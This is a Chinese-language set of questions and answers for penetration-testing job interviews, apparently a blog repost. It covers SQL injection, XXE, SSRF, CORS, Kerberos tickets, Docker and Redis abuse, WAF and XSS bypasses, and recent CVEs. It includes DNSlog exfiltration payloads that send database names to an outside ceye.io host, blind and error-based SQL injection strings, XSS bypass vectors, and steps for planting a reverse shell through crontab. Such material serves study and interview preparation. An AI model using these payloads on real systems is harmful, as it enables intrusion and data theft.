问:Sql 注入无回显的情况下,利用 DNSlog,mysql 下利用什么构造代码,mssql 下又如何?
答:
(1)没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于防火墙的存在,容易被封禁IP,可以尝试调整请求频率,有条件的使用代理池进行请求。
(2)此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域名中,然后读取 DNS 解析时的日志,来获取想要的信息。
(3)Mysql 中利用 load_file() 构造payload
*' and if((select load_file(concat('\\\\',(select database()),'.xxx.ceye.io\\abc'))),1,0)# *
(4)Mssql 下利用 master..xp_dirtree 构造payload
*DECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+'.xxx.ceye.io';EXEC('master..xp_dirtree"\'+@host+'\foobar$"'); *
问:XXE 漏洞原理,代码审计如何寻找?</u>
答:
(1)XXE (XML 外部实体注入)当 应用允许引用 XML 外部实体时,攻击者通过构造恶意内容,就可能进行任意文件读取、系统命令执行、内网端口探测、内网网站攻击等操作。
支持的协议如下图:
Java :支持http、https、file、ftp、mailto、jar、netdoc、(1.8不支持gopher)
(2)审计函数,涉及到XML文件处理,都可能造成 XXE
(3)防御方法:禁用外部实体
问:SSRF 禁用 127.0.0.1 后如何绕过,支持哪些协议?</u>
答:
(1)利用进制转换
(2)利用DNS解析
(3)利用句号(127。0。0。1)
(4)利用[::](http://[::]:80/);
(5)利用@(http://example.com@127.0.0.1);
(6)利用短地址(http://dwz.cn/11SMa);
(7)协议(Dict://、SFTP://、TFTP://、LDAP://、Gopher://)
问:应急响应如何查找挖矿病毒,如何通过进程找到挖矿文件</u>
答:
(1)任务管理器netstat -anp寻找异常进程PID看端口信息,然后根据端口信息定位到文件,cd /proc/PID (ls -l查看),
禁用可疑的服务项。
(2)windows还可以用wmic分析进程参数
问:struts2框架漏洞原理</u>
答:
(1)struts是java的web框架
(2)采取OGNL表达式,处理view层数据字符串到controller层转换成java对象
(3)重点关注的编号加粗如下
S2-057 影响范围非常小
S2-048 影响范围非常小
S2-046 和S2-045一样
S2-045 影响范围较大----通过Content-Type这个header头,进而执行命令,通过Strus2对错误消息处理进行回显
S2-037 影响范围小
S2-032 影响范围小
S2-020 影响范围小
S2-019 影响范围一般
S2-016 影响范围非常大
S2-013 S2-016范围内
S2-009 S2-016范围内
S2-005 S2-016范围内
问:JAVA反序列化原理</u>
答:
(1)Java序列化指Java对象转换为字节序列的过程
(2)Java反序列化指字节序列恢复为Java对象的过程
(3) Commons-collections 爆出第一个漏洞开始,Java反序列化漏洞的事件就层出不穷。
(4)在Java中,利用ObjectInputStream的readObject方法进行对象读取
(5)可以深入了解 ysoserial有哪些gadgets
<u style="margin: 0px; padding: 0px; box-sizing: 问:cors如何产生,有哪些利用方式?绕过同源策略的方法有哪些?jsonp跨域如何利用?</u>
答:
(1)CORS全称是"跨域资源共享"(Cross-origin resource sharing),Origin源未严格,从而造成跨域问题,允许浏览器向跨源服务器,发出XMLHttpRequest
请求
(2)Origin为*的时候,使用curl测试CORS,
curl <url> -H “Origin: https://evil.com” -I
再寻找的api接口是否有敏感信息泄漏。
(3)同源:协议相同、域名相同、端口相同,绕过同源策略限制的方法:
1、document.domain属性
2、片段识别符(URL后加#号)
3、window.name
4、跨文档通信API
5、JSONP
6、CORS
7、WebSockets
(4)jsonp跨域利用:获取JSON数据并编码发送到远程服务器上
问:phar协议如何利用,php伪协议input与post数据包发送有什么区别?</u>
答:
(1)可以Bypass一些waf,绕过上传限制
(2)Phar反序列化,Phar:// 伪协议读取phar文件时,会反序列化meta-data储存
(3) 区别
一、 application/x-www-form-urlencoded 或 multipart/form-data时
php://input 中是原始数据。
$_POST 中是关联数组,且没有上传控件的内容。
二、enctype="multipart/form-data" 时
php://input 是无效的。
三、 Content-Type = "text/plain"时
$_POST 不能获取post的数据, php://input可以。
问:内网服务器,如何进行信息收集</u>
答:
(1)手动,用一些小工具(批量看存活)
new user /domain查域、net view看共享、hosts文件内网ip域名映射、wifi记录和密码、浏览器中的密码、敏感文件、各类服务的配置文件中信息、历史命令、ssh私钥、FTP的连接信息、xshell等ssh连接工具的session文件,3389连接历史和被连接历史信息、某些内网api接口未授权访问
(2)扫描器
主机扫描、端口扫描、漏洞扫描、识别内网环境、密码爆破、抓密码
(3)留后门,抓信息
问:内网黄金票据、白银票据的区别和利用方式</u>
答:
(1)白银票据:抓取到了域控服务hash的情况下,在客户端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。
黄金票据:直接抓取域控中账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。
(2)通过mimkatz执行,导出域控中账号的Hash
问:docker远程api漏洞原理</u>
答:
(1)docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,该未授权访问,可以通过url操作,执行docker命令。
(2)通过docker client执行目标服务器容器命令,docker是以root权限运行的
一、有运行ssh服务,/root/.ssh目录挂载到container内,,然后修改/.ssh/authorized_keys 文件,把自己的public key写进去
二、没有运行ssh服务,利用挂载写crontab定时任务,反弹一个shell
问:ssrf怎么用redis写shell</u>
答:
(1)SSRF服务端请求伪造
*一、对内网扫描,获取 banner *
二、攻击运行在内网的应用,主要是使用 GET 参数就可以实现的攻击(比如 Struts2,sqli 等)
三、利用协议读取本地文件
四、 云计算环境AWS Google Cloud 环境可以调用内网操作 ECS 的 API
(2)如webligic SSRF漏洞
通过SSRF的gopher协议操作内网的redis,利用redis将反弹shell写入crontab定时任务,url编码,将\r字符串替换成%0d%0a
问:预编译能否100%防sql注入,如果不能,写一个</u>
答:
不能。
一、
类似于宽字节注入
二、
参数name是一串数组,PDO不会生效
三、
PDO对DDL不生效
问:WAF 绕过</u>
答:
1 注释替换空格
2 字符集绕过
3 chunked绕过
4 上传请求 multipart 绕过
5.参数污染
。。。
问:SQL注入构造payload</u>
答:
一、布尔型盲注
(1)mysql :
'and (length(database()))>10 --+
(2)oracle:
' and 1=(select decode(user,'SCOTT',1,0) from dual) --
二、时间型盲注
and if(ascii(substr((select database()),1,1))>115,1,sleep(5))
三、利用报错回显
(1) extractvalue
and extractvalue(1,concat(0x7e,(select database())))
(2) updatexml
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
问:UDF提权原理</u>
答:利用了root 高权限,创建带有调用cmd的函数的udf.dll动态链接库,导出 udf.dll 文件后,我们就可以直接在命令框输入 cmd
问:XSS弹窗函数及常见的 XSS 绕过策略</u>
答:
一、alert,confirm,prompt三种函数
二、绕过策略
1. 大小写混合
2. 双写
3.编码
4. fuzz 低频使用标签 <details/open/ontoggle>
5. fuzz 低频使用函数 ontoggle 等
6.<img/src=1>
7.%0a或者%0d绕过
问:Windows cmd 如何下载文件</u>
答:
1.certutil.exe
2.powershell
3.bitsadmin
4.vbs
5.ftp
问:SVN/GIT源代码泄露**</u>
答:
(1)在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息
/.git/config
(2)使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞
/.svn/entries
问:reverse_tcp 和 bind_tcp 的区别</u>
答:
(1)reverse_tcp
木马会主动连接目标服务器
(2)bind_tcp
木马会监听本地的端口
什么是fastjson,有哪些漏洞?
答:
(1)Fastjson是Alibaba开发的Java语言编写的高性能JSON库
(2)攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE
(3)fastjson漏洞历史
1.fastjson-1.2.24
(fastjson接受的JSON可以通过艾特type字段来指定该JSON应当还原成何种类型的对象,在反序列化的时候方便操作)
2.fastjson-1.248以下
(checkAutoType中使用TypeUtils.getClassFromMapping(typeName)去获取class不为空,从而绕过了黑名单检测)
3.fastjson-1.2.60以下
(在此版本以下,字符串中包含\x转义字符时可以造成dos漏洞)
理解漏洞
讲诉一些近期及有代表性的漏洞
Microsoft Exchange .Net反序列化远程代码执行(CVE-2020-0688)
该漏洞是由于Exchange控制面板(ECP)组件中使用了静态密钥validationKey
和decryptionKey
Apache Tomcat 文件包含漏洞(CVE-2020-1938)
默认情况下,Tomcat会开启AJP连接器, Tomcat在AJP协议
的实现上存在漏洞,导致攻击者可以通过发送恶意的请求,可以读取或者包含Web根目录下的任意文件,配合文件上传,将导致任意代码执行(RCE)
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
weblogic核心组件中IIOP协议
,通过该协议对存在漏洞的WebLogic进行远程代码执行的攻击
Apache Solr远程代码执行(CVE-2019-12409)
默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS
字段默认配置不安全.如果使用默认配置,将启用JMX监视服务并将对公网监听18983的RMI端口,无需任何验证,配合JMX RMI远程代码执行
SHIRO-550 反序列化漏洞
shiro默认使用了CookieRememberMeManager
,其处理cookie的流程是:
得到rememberMe
的cookie值-->Base64解码-->AES解密-->反序列化
AES的密钥是硬编码在代码里,就导致了反序列化的RCE漏洞
SHIRO-721反序列化漏洞
不需要key,利用Padding Oracle Attack
构造出RememberMe
字段后段的值结合合法的RememberMe cookie
即可完成攻击
泛微Ecology OA SQL注入漏洞
validate.jsp接口的SQL注入,/cpt/manage/validate.jsp
泛微ecology OA系统接口存在数据库配置信息泄露
/mobile/dbconfigreader.jsp,直接访问该页面将为DES加密以后的乱码,使用DES算法结合硬编码的key进行解密
Confluence本地文件泄露漏洞(CVE-2019-3394)
catalina.jar
中的org.apache.catalina.webresources.StandardRoot.class
的getResource
方法的validate
存在过滤和限制,所以可遍历路径均在/WEB-INF
下
Apache Dubbo反序列化漏洞(CVE-2019-17564)
当HTTP remoting 开启的时候,存在反序列化漏洞